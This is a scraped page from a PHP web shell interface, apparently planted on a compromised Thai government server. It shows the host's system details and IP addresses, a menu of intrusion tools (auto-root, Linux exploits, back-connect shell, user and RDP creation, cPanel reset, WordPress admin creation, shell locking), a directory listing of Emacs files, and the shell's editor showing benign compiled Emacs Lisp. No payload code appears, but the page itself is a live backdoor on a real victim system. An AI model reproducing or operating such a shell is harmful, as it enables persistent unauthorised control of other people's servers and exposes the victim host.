Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
textmodes /
[ HOME SHELL ]
Name
Size
Permission
Action
artist.elc
156.01
KB
-rw-r--r--
bib-mode.elc
7.43
KB
-rw-r--r--
bibtex-style.elc
5.39
KB
-rw-r--r--
bibtex.elc
157.5
KB
-rw-r--r--
conf-mode.elc
28.99
KB
-rw-r--r--
css-mode.elc
13.28
KB
-rw-r--r--
dns-mode.elc
6.9
KB
-rw-r--r--
enriched.elc
13.78
KB
-rw-r--r--
fill.elc
34.12
KB
-rw-r--r--
flyspell.elc
52.56
KB
-rw-r--r--
ispell.elc
97.58
KB
-rw-r--r--
makeinfo.elc
6.2
KB
-rw-r--r--
nroff-mode.elc
10.21
KB
-rw-r--r--
page-ext.elc
15.45
KB
-rw-r--r--
page.elc
3.19
KB
-rw-r--r--
paragraphs.elc
15.18
KB
-rw-r--r--
picture.elc
26.27
KB
-rw-r--r--
po.elc
2.84
KB
-rw-r--r--
refbib.elc
18.08
KB
-rw-r--r--
refer.elc
9.21
KB
-rw-r--r--
refill.elc
6.17
KB
-rw-r--r--
reftex-auc.elc
6
KB
-rw-r--r--
reftex-cite.elc
26.53
KB
-rw-r--r--
reftex-dcr.elc
12.53
KB
-rw-r--r--
reftex-global.elc
12.67
KB
-rw-r--r--
reftex-index.elc
61.35
KB
-rw-r--r--
reftex-parse.elc
21.31
KB
-rw-r--r--
reftex-ref.elc
19.57
KB
-rw-r--r--
reftex-sel.elc
16.58
KB
-rw-r--r--
reftex-toc.elc
30.88
KB
-rw-r--r--
reftex-vars.elc
80.53
KB
-rw-r--r--
reftex.elc
56.79
KB
-rw-r--r--
remember.elc
12.73
KB
-rw-r--r--
rst.elc
72.23
KB
-rw-r--r--
sgml-mode.elc
80.43
KB
-rw-r--r--
spell.elc
4.04
KB
-rw-r--r--
table.elc
161.74
KB
-rw-r--r--
tex-mode.elc
87.19
KB
-rw-r--r--
texinfmt.elc
83.84
KB
-rw-r--r--
texinfo.elc
35.12
KB
-rw-r--r--
texnfo-upd.elc
45.86
KB
-rw-r--r--
text-mode.elc
7.39
KB
-rw-r--r--
tildify.elc
8.47
KB
-rw-r--r--
two-column.elc
12.86
KB
-rw-r--r--
underline.elc
1.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : refill.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:05:19 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/textmodes/refill.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`refill.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (custom-declare-group 'refill nil "Refilling paragraphs on changes." :group 'fill) #@104 Portion of the most recently filled paragraph not needing filling. This is used to optimize refilling. (defvar refill-ignorable-overlay nil (#$ . 697)) (make-variable-buffer-local 'refill-ignorable-overlay) #@64 Adjust OVERLAY to not include the about-to-be-modified region. (defalias 'refill-adjust-ignorable-overlay #[(overlay afterp beg end &optional len) "?\205$ \212 b\210\303y\210`\304\n!X\203 \305\nee#\202# \305\n\304\n!`#)\207" [afterp beg overlay -1 overlay-start move-overlay] 4 (#$ . 910)]) #@77 Like `fill-paragraph' at POS, but don't delete whitespace at paragraph end. (defalias 'refill-fill-paragraph-at #[(pos &optional arg) "\212b\210\306 \210\307\310!\210`\311 \210`\312 !\313 !\fV?\205\215 b\210\fY\203p \f\nW\203p \203H \203A \314\230\203H \315\f \"\202J \316\214\203_ \317\n #\210\202f \320\n #\210)\321 `#*\202\215 \214\203\200 \317\f #\210\202\207 \320\f #\210)\321 \f`#-\207" [pos refill-ignorable-overlay oend obeg beg end forward-paragraph skip-syntax-backward "-" backward-paragraph overlay-start overlay-end "" fill-context-prefix nil fill-region fill-region-as-paragraph move-overlay adaptive-fill-mode fill-prefix use-hard-newlines arg] 5 (#$ . 1209)]) #@69 Like `fill-paragraph' but don't delete whitespace at paragraph end. (defalias 'refill-fill-paragraph #[(arg) "\301`\"\207" [arg refill-fill-paragraph-at] 3 (#$ . 1924)]) #@432 Non-nil tells `refill-post-command-function' to do its processing. Set by `refill-after-change-function' in `after-change-functions' and unset by `refill-post-command-function' in `post-command-hook', and sometimes `refill-pre-command-function' in `pre-command-hook'. This ensures refilling is only done once per command that causes a change, regardless of the number of after-change calls from commands doing complex processing. (defvar refill-doit nil (#$ . 2102)) (make-variable-buffer-local 'refill-doit) #@70 Function for `after-change-functions' which just sets `refill-doit'. (defalias 'refill-after-change-function #[(beg end len) "?\205 \211\207" [undo-in-progress end refill-doit] 2 (#$ . 2618)]) #@56 Post-command function to do refilling (conditionally). (defalias 'refill-post-command-function #[nil "\205W \303=\203 \n`SfH\203T \304!\210\305\202T \306 \307\"\204T \306 \310\"\203P \212\311 \210\312\305x\210\214e`}\210\304!\210*~\210\212\312\305w\210\214\313 d}\210\304!\210*\202T \304!\210\305\211\207" [refill-doit this-command auto-fill-chars self-insert-command refill-fill-paragraph-at nil memql (quoted-insert fill-paragraph fill-region) (newline newline-and-indent open-line indent-new-comment-line reindent-then-newline-and-indent) beginning-of-line "\n" line-beginning-position] 3 (#$ . 2821)]) #@55 Pre-command function to do refilling (conditionally). (defalias 'refill-pre-command-function #[nil "\205 \302=?\205 \303!\210\304\211\207" [refill-doit this-command self-insert-command refill-fill-paragraph-at nil] 2 (#$ . 3442)]) (byte-code "\301B\302\301!\204 \303\301\304\"\210\304\207" [current-load-list refill-saved-state default-boundp set-default nil] 3) #@91 Non-nil if Refill mode is enabled. Use the command `refill-mode' to change this variable. (defvar refill-mode nil (#$ . 3820)) (make-variable-buffer-local 'refill-mode) #@287 Toggle Refill minor mode. With prefix arg, turn Refill mode on if arg is positive, otherwise turn it off. When Refill mode is on, the current paragraph will be formatted when changes are made within it. Self-inserting characters only cause refilling if they would cause auto-filling. (defalias 'refill-mode #[(&optional arg) "\306 \307=\203 \n?\202( \203 \310 !\311V\202( \n\204\"